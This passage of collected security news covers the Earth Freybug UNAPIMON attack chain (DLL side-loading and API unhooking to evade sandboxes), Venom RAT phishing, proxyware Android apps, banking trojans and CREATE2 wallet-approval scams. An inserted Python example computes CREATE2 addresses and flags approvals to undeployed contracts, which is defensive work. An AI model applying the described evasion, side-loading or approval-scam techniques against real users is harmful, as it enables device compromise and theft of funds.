The starting point of the attack chain is the use of a legitimate executable associated with VMware Tools ("vmtoolsd.exe") to create a scheduled task using "schtasks.exe" and deploy a file named "cc.bat" in the remote machine.
It's currently not known how the malicious code came to be injected in vmtoolsd.exe, although it's suspected that it may have involved the exploitation of external-facing servers.
The batch script is designed to amass system information and launch a second scheduled task on the infected host, which, in turn, executes another batch file with the same name ("cc.bat") to ultimately run the UNAPIMON malware.
"The second cc.bat is notable for leveraging a service that loads a non-existent library to side-load a malicious DLL," So explained. "In this case, the service is SessionEnv."
This paves the way for the execution of TSMSISrv.DLL that's responsible for dropping another DLL file (i.e., UNAPIMON) and injecting that same DLL into cmd.exe. Simultaneously, the DLL file is also injected into SessionEnv for defense evasion.
On top of that, the Windows command interpreter is designed to execute commands coming from another machine, essentially turning it into a backdoor.
A simple C++-based malware, UNAPIMON is equipped to prevent child processes from being monitored by leveraging an open-source Microsoft library called Detours to unhook critical API functions, thereby evading detection in sandbox environments that implement API monitoring through hooking.
The cybersecurity company characterized the malware as original, calling out the author's "coding prowess and creativity" as well as their use of an off-the-shelf library to carry out malicious actions.
"Earth Freybug has been around for quite some time, and their methods have been seen to evolve through time," Trend Micro said.
"This attack also demonstrates that even simple techniques can be used effectively when applied correctly. Implementing these techniques to an existing attack pattern makes the attack more difficult to discover."
Google to Delete Billions of Browsing Records in 'Incognito Mode' Privacy Lawsuit Settlement
2.4.24
Security
The Hacker News
Google has agreed to purge billions of data records reflecting users' browsing activities to settle a class action lawsuit that claimed the search giant tracked them without their knowledge or consent in its Chrome browser.
The class action, filed in 2020, alleged the company misled users who thought their internet browsing activity remained private when using the "incognito" or "private" mode on web browsers like Chrome, by tracking that activity.
In late December 2023, it emerged that the company had consented to settle the lawsuit. The deal is currently pending approval by the U.S. District Judge Yvonne Gonzalez Rogers.
"The settlement provides broad relief regardless of any challenges presented by Google's limited record keeping," a court filing on April 1, 2024, said.
"Much of the private browsing data in these logs will be deleted in their entirety, including billions of event level data records that reflect class members' private browsing activities."
As part of the data remediation process, Google is also required to delete information that makes private browsing data identifiable by redacting data points like IP addresses, generalizing User-Agent strings, and removing detailed URLs within a specific website (i.e., retaining only the domain-level portion of the URL).
In addition, it has been asked to delete the so-called X-Client-Data header field, which Google described as a Chrome-Variations header that captures the "state of the installation of Chrome itself, including active variations, as well as server-side experiments that may affect the installation."
This header is generated from a randomized seed value, making it potentially unique enough to identify specific Chrome users.
Other settlement terms require Google to block third-party cookies within Chrome's Incognito Mode for five years, a setting the company has already implemented for all users. The tech company has separately announced plans to eliminate tracking cookies by default by the end of the year.
Google has since also updated the wording of Incognito Mode as of January 2024 to clarify that the setting will not change "how data is collected by websites you visit and the services they use, including Google."
The lawsuit extracted admissions from Google employees that characterized the browser's Incognito browsing mode as a "confusing mess," "effectively a lie," and a "problem of professional ethics and basic honesty."
It further laid bare internal exchanges in which executives argued Incognito Mode shouldn't be called "private" because it risked "exacerbating known misconceptions."
The development comes as Google said it has started automatically blocking bulk senders in Gmail that don't meet its Email sender guidelines in an attempt to cut down on spam and phishing attacks.
The new requirements make it mandatory for email senders who push out more than 5,000 messages per day to Gmail accounts to provide a one-click unsubscribe option and respond to unsubscription requests within two days.
Massive Phishing Campaign Strikes Latin America: Venom RAT Targeting Multiple Sectors
2.4.24
Virus
The Hacker News
The threat actor known as TA558 has been attributed to a new massive phishing campaign that targets a wide range of sectors in Latin America with the goal of deploying Venom RAT.
The attacks primarily singled out hotel, travel, trading, financial, manufacturing, industrial, and government verticals in Spain, Mexico, United States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.
Active since at least 2018, TA558 has a history of targeting entities in the LATAM region to deliver a variety of malware such as Loda RAT, Vjw0rm, and Revenge RAT.
The latest infection chain, according to Perception Point researcher Idan Tarab, leverages phishing emails as an initial access vector to drop Venom RAT, a fork of Quasar RAT that comes with capabilities to harvest sensitive data and commandeer systems remotely.
The disclosure comes as threat actors have been increasingly observed using the DarkGate malware loader following the law enforcement takedown of QakBot last year to target financial institutions in Europe and the U.S.
"Ransomware groups utilize DarkGate to create an initial foothold and to deploy various types of malware in corporate networks," EclecticIQ researcher Arda Büyükkaya noted.
"These include, but are not limited to, info-stealers, ransomware, and remote management tools. The objective of these threat actors is to increase the number of infected devices and the volume of data exfiltrated from a victim."
It also follows the emergence of malvertising campaigns designed to deliver malware like FakeUpdates (aka SocGholish), Nitrogen, and Rhadamanthys.
Earlier this month, Israeli ad security company GeoEdge revealed that a notorious malvertising group tracked as ScamClub "has shifted its focus towards video malvertising assaults, resulting in a surge in VAST-forced redirect volumes since February 11, 2024."
The attacks entail the malicious use of Video Ad Serving Templates (VAST) tags – which are used for video advertising – to redirect unsuspecting users to fraudulent or scam pages but only upon successful passage of certain client-side and server-side fingerprinting techniques.
A majority of the victims are located in the U.S. (60.5%), followed by Canada (7.2%), the U.K. (4.8%), Germany (2.1%), and Malaysia (1.7%), among others.
Indian Government Rescues 250 Citizens Forced into Cybercrime in Cambodia
1.4.24
BigBrothers
The Hacker News
The Indian government said it has rescued and repatriated about 250 citizens in Cambodia who were held captive and coerced into running cyber scams.
The Indian nationals "were lured with employment opportunities to that country but were forced to undertake illegal cyber work," the Ministry of External Affairs (MEA) said in a statement, adding it had rescued 75 people in the past three months.
It also said it's working with "with Cambodian authorities and with agencies in India to crack down on those responsible for these fraudulent schemes."
The development comes in the wake of a report from the Indian Express that said more than 5,000 Indians stuck in Cambodia were forced into "cyber slavery" by organized crime rackets to scam people in India and extort money by masquerading as law enforcement authorities in some cases.
The report also tracks with an earlier disclosure from INTERPOL, which characterized the situation as human trafficking-fuelled fraud on an industrial scale.
This included an accountant from the state of Telangana, who was "lured to Southeast Asia where he was forced to participate in online fraud schemes in inhuman conditions." He was subsequently let go after paying a ransom.
In another instance highlighted by the Indian Express, one of the rescued men was recruited by an agent from the south Indian city of Mangaluru for a data entry job, only to be asked to create fake social media accounts with photographs of women and use them to contact people.
"We had targets and if we didn't meet those, they would not give us food or allow us into our rooms," the individual, identified only as Stephen, was quoted as saying.
China and the Philippines have undertaken similar efforts to free hundreds of Filipinos, Chinese, and other foreign nationals who were entrapped and forced into criminal activity, running what's called pig butchering scams.
These schemes typically start with the scammer adopting a bogus identity to lure prospective victims into investing in non-existing crypto businesses that are designed to steal their funds. The fraudsters are known to gain their target's trust under the illusion of a romantic relationship.
In a report published in February 2024, Chainalysis said the cryptocurrency wallets associated with one of the pig butchering gangs operating out of Myanmar have recorded close to $100 million in crypto inflows, some of which is also estimated to include the ransom payments made by the families of trafficked workers.
"The brutal conditions trafficking victims face on the compounds also lend additional urgency to solving the problem of romance scamming — not only are consumers being bilked out of hundreds of millions of dollars each year, but the gangs behind those scams are also perpetuating a humanitarian crisis," the blockchain analytics firm said.
News of the rescue efforts also follows research from Check Point that threat actors are exploiting a function in Ethereum called CREATE2 to bypass security measures and gain unauthorized access to funds. Details of the scam were previously disclosed by Scam Sniffer in November 2023.
The crux of the technique is the use of CREATE2 to generate a new "temporary" wallet address that has no history of being reported for criminal activity, thus allowing threat actors to make the illicit transactions to the address once the victim approves the contract and circumvent protections that flag such addresses.
"The attack method involves tricking users into approving transactions for smart contracts that haven't been deployed yet, allowing cyber criminals to later deploy malicious contracts and steal cryptocurrencies," the Israeli company said.
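The property the two paragraphs above rely on is that a CREATE2 address is a pure function of the deployer, a salt and the init code, so it is known before anything is deployed there and has no on-chain history when the victim approves it. The following is an added example, not code from the article or from Check Point or Scam Sniffer: it derives the address with the EIP-1014 formula over a self-contained Keccak-256, then shows the check a wallet or monitoring pipeline can run on approvals, flagging any spender that has no bytecode at approval time. The factory address, salt, init code, router address, approvals and the `code_store` dictionary (standing in for `eth_getCode` results) are all constructed for the demonstration.

```python
# Added example (not from the article): why a CREATE2 address can be approved
# before any contract exists there, and a defender-side check for that state.
# keccak256 and create2_address follow the public Keccak and EIP-1014 specs;
# every address, salt, init code and approval below is constructed.

_MASK64 = (1 << 64) - 1


def _rol(v, n):
    """Rotate a 64-bit lane left by n bits."""
    return ((v << n) | (v >> (64 - n))) & _MASK64 if n else v


def _round_constants():
    # Keccak iota constants generated by the spec's 8-bit LFSR.
    rcs, r = [], 1
    for _ in range(24):
        rc = 0
        for j in range(7):
            r = ((r << 1) ^ ((r >> 7) * 0x71)) & 0xFF
            if r & 2:
                rc ^= 1 << ((1 << j) - 1)
        rcs.append(rc)
    return rcs


def _rho_offsets():
    # Rotation offsets from the (x, y) -> (y, 2x + 3y) walk in the Keccak spec.
    rot, x, y = [0] * 25, 1, 0
    for t in range(24):
        rot[x + 5 * y] = ((t + 1) * (t + 2) // 2) % 64
        x, y = y, (2 * x + 3 * y) % 5
    return rot


_RC = _round_constants()
_ROT = _rho_offsets()


def _keccak_f(lanes):
    """Keccak-f[1600] over 25 little-endian 64-bit lanes (lane (x, y) at index x + 5y)."""
    for rc in _RC:
        c = [lanes[x] ^ lanes[x + 5] ^ lanes[x + 10] ^ lanes[x + 15] ^ lanes[x + 20]
             for x in range(5)]
        d = [c[(x - 1) % 5] ^ _rol(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [lanes[i] ^ d[i % 5] for i in range(25)]            # theta
        b = [0] * 25
        for x in range(5):
            for y in range(5):                                       # rho + pi
                b[y + 5 * ((2 * x + 3 * y) % 5)] = _rol(lanes[x + 5 * y], _ROT[x + 5 * y])
        lanes = [b[i] ^ (~b[(i + 1) % 5 + 5 * (i // 5)] & b[(i + 2) % 5 + 5 * (i // 5)])
                 for i in range(25)]                                 # chi
        lanes[0] ^= rc                                               # iota
    return lanes


def keccak256(data: bytes) -> bytes:
    """Keccak-256 as used by Ethereum (0x01 pad byte, unlike SHA3-256's 0x06)."""
    rate = 136
    buf = bytearray(data) + b"\x01"
    buf += b"\x00" * (-len(buf) % rate)
    buf[-1] |= 0x80
    lanes = [0] * 25
    for off in range(0, len(buf), rate):
        for i in range(rate // 8):
            lanes[i] ^= int.from_bytes(buf[off + 8 * i:off + 8 * i + 8], "little")
        lanes = _keccak_f(lanes)
    return b"".join(lane.to_bytes(8, "little") for lane in lanes[:4])


def create2_address(deployer: bytes, salt: bytes, init_code: bytes) -> str:
    """EIP-1014: keccak256(0xff ++ deployer ++ salt ++ keccak256(init_code))[12:]."""
    assert len(deployer) == 20 and len(salt) == 32
    return "0x" + keccak256(b"\xff" + deployer + salt + keccak256(init_code))[12:].hex()


def flag_approvals_to_undeployed_spenders(approvals, code_store):
    """Return approvals whose spender holds no bytecode, i.e. there is nothing to audit yet.

    code_store stands in for eth_getCode lookups (constructed here); an empty
    value is exactly the state a CREATE2 address is in before the deployment.
    """
    return [a for a in approvals if not code_store.get(a["spender"].lower())]


# --- constructed sample data, not from any real chain ---
FACTORY = bytes.fromhex("11" * 20)        # hypothetical attacker factory contract
SALT = (42).to_bytes(32, "big")
INIT_CODE = b"\x00"                       # stand-in init code (a single STOP opcode)
LURE_SPENDER = create2_address(FACTORY, SALT, INIT_CODE)   # computable before deployment
ROUTER = "0x" + "aa" * 20                 # hypothetical legitimate, already-deployed spender
CODE_STORE = {ROUTER: b"\x60\x80"}        # only the router has bytecode at approval time

APPROVALS = [
    {"owner": "0x" + "01" * 20, "spender": ROUTER, "amount": 10**18},
    {"owner": "0x" + "02" * 20, "spender": LURE_SPENDER, "amount": 2**256 - 1},
]


def demo():
    flagged = flag_approvals_to_undeployed_spenders(APPROVALS, CODE_STORE)
    # Later the attacker deploys: the address that now holds code is the one the
    # victim already approved, and its history was empty until this moment.
    after_deploy = {**CODE_STORE, LURE_SPENDER: b"\x60\x00"}
    return flagged, LURE_SPENDER in after_deploy
```

The check is deliberately simple: an approval whose spender has no code is not necessarily malicious (legitimate counterfactual deployments exist), but it is the case reputation lists cannot cover, so it deserves an explicit warning rather than silent acceptance. A wallet that also treats an unlimited allowance (`2**256 - 1`) to such an address as high risk covers the pattern described above.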
Malicious Apps Caught Secretly Turning Android Phones into Proxies for Cybercriminals
1.4.24
OS
The Hacker News
Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store.
The findings come from HUMAN's Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user's device into a proxy node without their knowledge.
The operation has been codenamed PROXYLIB by the company. The 29 apps in question have since been removed by Google.
Residential proxies are a network of proxy servers sourced from real IP addresses provided by internet service providers (ISPs), helping users hide their actual IP addresses by routing their internet traffic through an intermediary server.
The anonymity benefits aside, they are ripe for abuse by threat actors to not only obfuscate their origins, but also to conduct a wide range of attacks.
"When a threat actor uses a residential proxy, the traffic from these attacks appears to be coming from different residential IP addresses instead of an IP of a data center or other parts of a threat actor's infrastructure," security researchers said. "Many threat actors purchase access to these networks to facilitate their operations."
Some of these networks can be created by malware operators tricking unsuspecting users into installing bogus apps that essentially corral the devices into a botnet that's then monetized for profit by selling the access to other customers.
The Android VPN apps discovered by HUMAN are designed to establish contact with a remote server, enroll the infected device to the network, and process any request from the proxy network.
Another notable aspect of these apps is that a subset of them identified between May and October 2023 incorporate a software development kit (SDK) from LumiApps, which contains the proxyware functionality. In both cases, the malicious capability is pulled off using a native Golang library.
LumiApps also offers a service that essentially permits users to upload any APK file of their choice, including legitimate applications, and bundle the SDK to it without having to create a user account, which can then be re-downloaded and shared with others.
"LumiApps helps companies gather information that is publicly available on the internet," the Israeli company says on its website. "It uses the user's IP address to load several web pages in the background from well-known websites."
"This is done in a way that never interrupts the user and fully complies with GDPR/CCPA. The web pages are then sent to companies, who use them to improve their databases, offering better products, services, and pricing."
These modified apps – called mods – are then distributed in and out of the Google Play Store. LumiApps promotes itself and the SDK as an alternative app monetization method to rendering ads.
There is evidence indicating that the threat actor behind PROXYLIB is selling access to the proxy network created by the infected devices through LumiApps and Asocks, a company that advertises itself as a seller of residential proxies.
What's more, in an effort to bake the SDK into as many apps as possible and expand the size of the botnet, LumiApps offers cash rewards to developers based on the amount of traffic that gets routed through user devices that have installed their apps. The SDK service is also advertised on social media and black hat forums.
Recent research published by Orange Cyberdefense and Sekoia characterized residential proxies as part of a "fragmented yet interconnected ecosystem," in which proxyware services are advertised in various ways ranging from voluntary contributions to dedicated shops and reselling channels.
"[In the case of SDKs], the proxyware is often embedded in a product or service," the companies noted. "Users may not notice that proxyware will be installed when accepting the terms of use of the main application it is embedded with. This lack of transparency leads to users sharing their Internet connection without a clear understanding."
The development comes as Lumen Black Lotus Labs disclosed that end-of-life (EoL) small home/small office (SOHO) routers and IoT devices are being compromised by a botnet known as TheMoon to power a criminal proxy service called Faceless.
Vultur Android Banking Trojan Returns with Upgraded Remote Control Capabilities
1.4.24
OS
The Hacker News
The Android banking trojan known as Vultur has resurfaced with a suite of new features and improved anti-analysis and detection evasion techniques, enabling its operators to remotely interact with a mobile device and harvest sensitive data.
"Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions," NCC Group researcher Joshua Kamp said in a report published last week.
Vultur was first disclosed in early 2021, with the malware capable of leveraging Android's accessibility services APIs to execute its malicious actions.
The malware has been observed to be distributed via trojanized dropper apps on the Google Play Store, masquerading as authenticator and productivity apps to trick unwitting users into installing them. These dropper apps are offered as part of a dropper-as-a-service (DaaS) operation called Brunhilda.
Other attack chains, as observed by NCC Group, involve the droppers being spread using a combination of SMS messages and phone calls – a technique called telephone-oriented attack delivery (TOAD) – to ultimately serve an updated version of the malware.
"The first SMS message guides the victim to a phone call," Kamp said. "When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the [legitimate] McAfee Security app."
The initial SMS message aims to induce a false sense of urgency by instructing the recipients to call a number to authorize a non-existent transaction that involves a large sum of money.
Upon installation, the malicious dropper executes three related payloads (two APKs and one DEX file) that register the bot with the C2 server, obtain accessibility services permissions for remote access via AlphaVNC and ngrok, and run commands fetched from the C2 server.
One of the prominent additions to Vultur is the ability to remotely interact with the infected device, including carrying out clicks, scrolls, and swipes, through Android's accessibility services, as well as download, upload, delete, install, and find files.
In addition, the malware is equipped to prevent the victims from interacting with a predefined list of apps, display custom notifications in the status bar, and even disable Keyguard to bypass lock screen security measures.
"Vultur's recent developments have shown a shift in focus towards maximizing remote control over infected devices," Kamp said.
"With the capability to issue commands for scrolling, swipe gestures, clicks, volume control, blocking apps from running, and even incorporating file manager functionality, it is clear that the primary objective is to gain total control over compromised devices."
The development comes as Team Cymru revealed the Octo (aka Coper) Android banking trojan's transition to a malware-as-a-service operation, offering its services to other threat actors for conducting information theft.
"The malware offers a variety of advanced features, including keylogging, interception of SMS messages and push notifications, and control over the device's screen," the company said.
"It employs various injects to steal sensitive information, such as passwords and login credentials, by displaying fake screens or overlays. Additionally, it utilizes VNC (Virtual Network Computing) for remote access to devices, enhancing its surveillance capabilities."
Octo campaigns are estimated to have compromised 45,000 devices, primarily spanning Portugal, Spain, Turkey, and the U.S. Some of the other victims are located in France, the Netherlands, Canada, India, and Japan.
The findings also follow the emergence of a new campaign targeting Android users in India that distributes malicious APK packages posing as online booking, billing, and courier services via a malware-as-a-service (MaaS) offering.
The malware "targets theft of banking information, SMS messages, and other confidential information from victims' devices," Broadcom-owned Symantec said in a bulletin.
McAfee Labs, which shed more light on the ongoing campaign, said the malware has been embedded in over 800 apps. More than 3,700 Android devices have been compromised. It attributed the MaaS service to an Indian cyber group named Elvia Infotech.
"[Scammers] typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services," security researchers ZePeng Chen and Wenfeng Yu said.
"This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account."